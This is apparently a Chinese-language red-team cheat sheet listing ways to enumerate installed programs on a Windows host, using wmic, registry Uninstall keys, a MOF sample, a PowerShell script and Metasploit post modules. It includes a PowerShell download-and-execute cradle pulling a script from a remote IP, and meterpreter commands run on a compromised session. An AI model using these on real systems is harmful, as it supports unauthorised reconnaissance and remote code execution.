获取主机已安装程序的多种方式

wmic product get name,version
wmic /namespace:\\root\cimv2 path win32_product get name,version
Get-WmiObject -Class win32_product | Select-Object -Property name,version

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
HKLM\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
HKCU\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall

mofcomp.exe C:\ProgramData\SampleProductsList.mof
wmic /namespace:"\\root\default" path sampleproductslist get displayname,displayversion
wmic /namespace:"\\root\default" path sampleproductslist32 get displayname,displayversion

// "AS-IS" sample MOF file for returning the two uninstall registry subkeys
// Unsupported, provided purely as a sample
// Requires compilation. Example: mofcomp.exe sampleproductslist.mof
// Implements sample classes: "SampleProductList" and "SampleProductlist32"
// (for 64-bit systems with 32-bit software)
#PRAGMA AUTORECOVER
[dynamic, provider("RegProv"),
ProviderClsid("{fe9af5c0-d3b6-11ce-a5b6-00aa00680c3f}"),ClassContext("local|HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall")]
class SampleProductsList {
[key] string KeyName;
[read, propertycontext("DisplayName")] string DisplayName;
[read, propertycontext("DisplayVersion")] string DisplayVersion;
};
[dynamic, provider("RegProv"),
ProviderClsid("{fe9af5c0-d3b6-11ce-a5b6-00aa00680c3f}"),ClassContext("local|HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432node\\Microsoft\\Windows\\CurrentVersion\\Uninstall")]
class SampleProductsList32 {
[key] string KeyName;
[read, propertycontext("DisplayName")] string DisplayName;
[read, propertycontext("DisplayVersion")] string DisplayVersion;
};

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.103:8888/ListInstalledPrograms.ps1'); ListPrograms

<#
.SYNOPSIS
This script can be used to list the programs that the current Windows system has installed.
Supprot x86 and x64 
Author: 3gstudent@3gstudent
License: BSD 3-Clause
#>
Function ListPrograms
{  
param($RegPath)  
$QueryPath = dir $RegPath -Name
foreach($Name in $QueryPath)
{
(Get-ItemProperty -Path $RegPath$Name).DisplayName
#        (Get-ItemProperty -Path $RegPath$Name).Publisher
#        (Get-ItemProperty -Path $RegPath$Name).DisplayVersion
}
} 
if ([IntPtr]::Size -eq 8)
{
Write-Host "[*] OS: x64"
Write-Host "[*] List the 64 bit programs that have been installed"
$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
ListPrograms -RegPath $RegPath
Write-Host "[+] List the 32 bit programs that have been installed"
$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\"
ListPrograms -RegPath $RegPath
}
else
{
Write-Host "[*] OS: x86"
Write-Host "[*] List the 32 bit programs that have been installed"
$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
ListPrograms -RegPath $RegPath
}

msf5 exploit(windows/misc/hta_server) > use post/windows/gather/enum_applications
msf5 post(windows/gather/enum_applications) > set session 1
msf5 post(windows/gather/enum_applications) > exploit
meterpreter > run get_application_list